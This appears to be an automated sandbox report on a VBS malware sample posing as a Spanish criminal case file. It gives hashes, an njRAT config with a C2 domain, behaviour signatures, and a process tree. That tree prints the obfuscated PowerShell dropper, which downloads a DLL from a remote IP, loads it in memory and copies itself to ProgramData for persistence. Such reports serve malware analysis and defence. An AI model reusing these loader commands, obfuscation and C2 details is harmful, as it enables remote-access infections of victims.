Analysis

  • max time kernel
    149s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01/09/2022, 17:17

General

  • Target

    Acta Referencial Del Caso Penal RDV-09939778312.vbs

  • Size

    344KB

  • MD5

    f756f1aa3b657845808b1b6dd2e417c6

  • SHA1

    d3f93f3093a7b6491890fcb816ddd4dc0b498fe0

  • SHA256

    7d7b58a161db20052b11323229ef2a0289d7bd60fa43ae054589b9d3f895cde5

  • SHA512

    d0904aff71248c4e3b3a6267b79de255d77a52f6b90578e68f769bee70d56e521fbf2f10ae7864c26be5b8dd54b6f2914885cced6ec1551a9b98dfa482d274aa

  • SSDEEP

    96:LELC6OuuvYUZelhkMtm0eW2hCugT5fqR+5Z9fAWxn42Of7bsITJYYmI1e5fKq373:TLgMmZ9YI0zwNYmtSqLyzfu

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://20.7.14.99/server/dll.txt

Extracted

Family

njrat

Version

0.7NC

Botnet

NYAN CAT

C2

agostiando.duckdns.org:8080

Mutex

12b010cb2cf4431e

Attributes
  • reg_key

    12b010cb2cf4431e

  • splitter

    @!#&^%$

Signatures

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 36 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Acta Referencial Del Caso Penal RDV-09939778312.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:524
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⏏⏏Bw⏏⏏Ek⏏⏏QwB3⏏⏏HY⏏⏏I⏏⏏⏏⏏9⏏⏏C⏏⏏⏏⏏Jw⏏⏏l⏏⏏G8⏏⏏YgB6⏏⏏GU⏏⏏cQB1⏏⏏Gk⏏⏏bw⏏⏏l⏏⏏Cc⏏⏏OwBb⏏⏏EI⏏⏏eQB0⏏⏏GU⏏⏏WwBd⏏⏏F0⏏⏏I⏏⏏⏏⏏k⏏⏏EQ⏏⏏T⏏⏏BM⏏⏏C⏏⏏⏏⏏PQ⏏⏏g⏏⏏Fs⏏⏏UwB5⏏⏏HM⏏⏏d⏏⏏Bl⏏⏏G0⏏⏏LgBD⏏⏏G8⏏⏏bgB2⏏⏏GU⏏⏏cgB0⏏⏏F0⏏⏏Og⏏⏏6⏏⏏EY⏏⏏cgBv⏏⏏G0⏏⏏QgBh⏏⏏HM⏏⏏ZQ⏏⏏2⏏⏏DQ⏏⏏UwB0⏏⏏HI⏏⏏aQBu⏏⏏Gc⏏⏏K⏏⏏⏏⏏o⏏⏏E4⏏⏏ZQB3⏏⏏C0⏏⏏TwBi⏏⏏Go⏏⏏ZQBj⏏⏏HQ⏏⏏I⏏⏏BO⏏⏏GU⏏⏏d⏏⏏⏏⏏u⏏⏏Fc⏏⏏ZQBi⏏⏏EM⏏⏏b⏏⏏Bp⏏⏏GU⏏⏏bgB0⏏⏏Ck⏏⏏LgBE⏏⏏G8⏏⏏dwBu⏏⏏Gw⏏⏏bwBh⏏⏏GQ⏏⏏UwB0⏏⏏HI⏏⏏aQBu⏏⏏Gc⏏⏏K⏏⏏⏏⏏n⏏⏏Gg⏏⏏d⏏⏏B0⏏⏏H⏏⏏⏏⏏Og⏏⏏v⏏⏏C8⏏⏏Mg⏏⏏w⏏⏏C4⏏⏏Nw⏏⏏u⏏⏏DE⏏⏏N⏏⏏⏏⏏u⏏⏏Dk⏏⏏OQ⏏⏏v⏏⏏HM⏏⏏ZQBy⏏⏏HY⏏⏏ZQBy⏏⏏C8⏏⏏Z⏏⏏Bs⏏⏏Gw⏏⏏LgB0⏏⏏Hg⏏⏏d⏏⏏⏏⏏n⏏⏏Ck⏏⏏KQ⏏⏏7⏏⏏Fs⏏⏏UwB5⏏⏏HM⏏⏏d⏏⏏Bl⏏⏏G0⏏⏏LgBB⏏⏏H⏏⏏⏏⏏c⏏⏏BE⏏⏏G8⏏⏏bQBh⏏⏏Gk⏏⏏bgBd⏏⏏Do⏏⏏OgBD⏏⏏HU⏏⏏cgBy⏏⏏GU⏏⏏bgB0⏏⏏EQ⏏⏏bwBt⏏⏏GE⏏⏏aQBu⏏⏏C4⏏⏏T⏏⏏Bv⏏⏏GE⏏⏏Z⏏⏏⏏⏏o⏏⏏CQ⏏⏏R⏏⏏BM⏏⏏Ew⏏⏏KQ⏏⏏u⏏⏏Ec⏏⏏ZQB0⏏⏏FQ⏏⏏eQBw⏏⏏GU⏏⏏K⏏⏏⏏⏏n⏏⏏EM⏏⏏b⏏⏏Bh⏏⏏HM⏏⏏cwBM⏏⏏Gk⏏⏏YgBy⏏⏏GE⏏⏏cgB5⏏⏏DM⏏⏏LgBD⏏⏏Gw⏏⏏YQBz⏏⏏HM⏏⏏MQ⏏⏏n⏏⏏Ck⏏⏏LgBH⏏⏏GU⏏⏏d⏏⏏BN⏏⏏GU⏏⏏d⏏⏏Bo⏏⏏G8⏏⏏Z⏏⏏⏏⏏o⏏⏏Cc⏏⏏UgB1⏏⏏G4⏏⏏Jw⏏⏏p⏏⏏C4⏏⏏SQBu⏏⏏HY⏏⏏bwBr⏏⏏GU⏏⏏K⏏⏏⏏⏏k⏏⏏G4⏏⏏dQBs⏏⏏Gw⏏⏏L⏏⏏⏏⏏g⏏⏏Fs⏏⏏bwBi⏏⏏Go⏏⏏ZQBj⏏⏏HQ⏏⏏WwBd⏏⏏F0⏏⏏I⏏⏏⏏⏏o⏏⏏Cc⏏⏏YQ⏏⏏1⏏⏏DM⏏⏏ZQBk⏏⏏GM⏏⏏NQ⏏⏏3⏏⏏DY⏏⏏YwBk⏏⏏DM⏏⏏LQ⏏⏏w⏏⏏Dc⏏⏏Z⏏⏏Bi⏏⏏C0⏏⏏NQ⏏⏏y⏏⏏Dg⏏⏏N⏏⏏⏏⏏t⏏⏏GI⏏⏏YQBk⏏⏏DQ⏏⏏LQ⏏⏏2⏏⏏DE⏏⏏O⏏⏏Bj⏏⏏DM⏏⏏Z⏏⏏⏏⏏1⏏⏏GY⏏⏏PQBu⏏⏏GU⏏⏏awBv⏏⏏HQ⏏⏏JgBh⏏⏏Gk⏏⏏Z⏏⏏Bl⏏⏏G0⏏⏏PQB0⏏⏏Gw⏏⏏YQ⏏⏏/⏏⏏HQ⏏⏏e⏏⏏B0⏏⏏C4⏏⏏YQBz⏏⏏GU⏏⏏cgBU⏏⏏GM⏏⏏dQBE⏏⏏C8⏏⏏bw⏏⏏v⏏⏏G0⏏⏏bwBj⏏⏏C4⏏⏏d⏏⏏Bv⏏⏏H⏏⏏⏏⏏cwBw⏏⏏H⏏⏏⏏⏏YQ⏏⏏u⏏⏏DI⏏⏏Ng⏏⏏w⏏⏏GQ⏏⏏O⏏⏏⏏⏏t⏏⏏HM⏏⏏ZQBu⏏⏏G8⏏⏏aQBj⏏⏏GE⏏⏏YwBp⏏⏏G4⏏⏏bwBt⏏⏏G8⏏⏏YwBl⏏⏏Gw⏏⏏ZQB0⏏⏏C8⏏⏏Yg⏏⏏v⏏⏏D⏏⏏⏏⏏dg⏏⏏v⏏⏏G0⏏⏏bwBj⏏⏏C4⏏⏏cwBp⏏⏏H⏏⏏⏏⏏YQBl⏏⏏Gw⏏⏏ZwBv⏏⏏G8⏏⏏Zw⏏⏏u⏏⏏GU⏏⏏ZwBh⏏⏏HI⏏⏏bwB0⏏⏏HM⏏⏏ZQBz⏏⏏GE⏏⏏YgBl⏏⏏HI⏏⏏aQBm⏏⏏C8⏏⏏Lw⏏⏏6⏏⏏HM⏏⏏c⏏⏏B0⏏⏏HQ⏏⏏a⏏⏏⏏⏏n⏏⏏Ck⏏⏏KQ⏏⏏=';$VXdfe = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('⏏⏏','A') ) ).replace('%obzequio%','');powershell.exe -Command $VXdfe
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4264
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$pICwv = '';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.7.14.99/server/dll.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('a53edc576cd3-07db-5284-bad4-618c3d5f=nekot&aidem=tla?txt.aserTcuD/o/moc.topsppa.260d8-senoicacinomocelet/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'))"
        3⤵
        • Blocklisted process makes network request
        • Drops startup file
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4532
        • C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Done.vbs
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4536
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          4⤵
            PID:400
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4624

    Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

            Filesize

            2KB

            MD5

            6cf293cb4d80be23433eecf74ddb5503

            SHA1

            24fe4752df102c2ef492954d6b046cb5512ad408

            SHA256

            b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

            SHA512

            0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            7ae41ba310b3e0f4fc4c6eff982554fd

            SHA1

            1a382df614c494ff947f88817b9f0fbc76de3a68

            SHA256

            93939edea4456184f43eeffda4f6e82f125bf5cead24cebcf317aa3fe83efcce

            SHA512

            8e13185cab71046bb411dae56ccaabd547d3bf961c200fc307f2961eb9caf175dd08631ecf6512578dd333dac3640e653f93115c840b3344648f2a597e789223

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            64B

            MD5

            feadc4e1a70c13480ef147aca0c47bc0

            SHA1

            d7a5084c93842a290b24dacec0cd3904c2266819

            SHA256

            5b4f1fe7ba74b245b6368dbe4ceffa438f14eef08ba270e9a13c57505c7717ac

            SHA512

            c9681a19c773891808fefa9445cea598d118c83bba89530a51ab993adbff39bce72b43f8e99d0c68e4a44f7e0f4c8ec128641c45cd557a8e1215721d5d992a23

          • memory/4264-133-0x00000242A3440000-0x00000242A3462000-memory.dmp

            Filesize

            136KB

          • memory/4264-145-0x00007FFBA90F0000-0x00007FFBA9BB1000-memory.dmp

            Filesize

            10.8MB

          • memory/4264-135-0x00007FFBA90F0000-0x00007FFBA9BB1000-memory.dmp

            Filesize

            10.8MB

          • memory/4532-136-0x00007FFBA90F0000-0x00007FFBA9BB1000-memory.dmp

            Filesize

            10.8MB

          • memory/4532-143-0x00007FFBA90F0000-0x00007FFBA9BB1000-memory.dmp

            Filesize

            10.8MB

          • memory/4536-138-0x00007FFBA90F0000-0x00007FFBA9BB1000-memory.dmp

            Filesize

            10.8MB

          • memory/4624-139-0x0000000000400000-0x000000000040C000-memory.dmp

            Filesize

            48KB

          • memory/4624-146-0x0000000005520000-0x00000000055BC000-memory.dmp

            Filesize

            624KB

          • memory/4624-147-0x0000000005CD0000-0x0000000006274000-memory.dmp

            Filesize

            5.6MB

          • memory/4624-148-0x00000000057C0000-0x0000000005852000-memory.dmp

            Filesize

            584KB

          • memory/4624-149-0x00000000056F0000-0x00000000056FA000-memory.dmp

            Filesize

            40KB

          • memory/4624-150-0x0000000005950000-0x00000000059B6000-memory.dmp

            Filesize

            408KB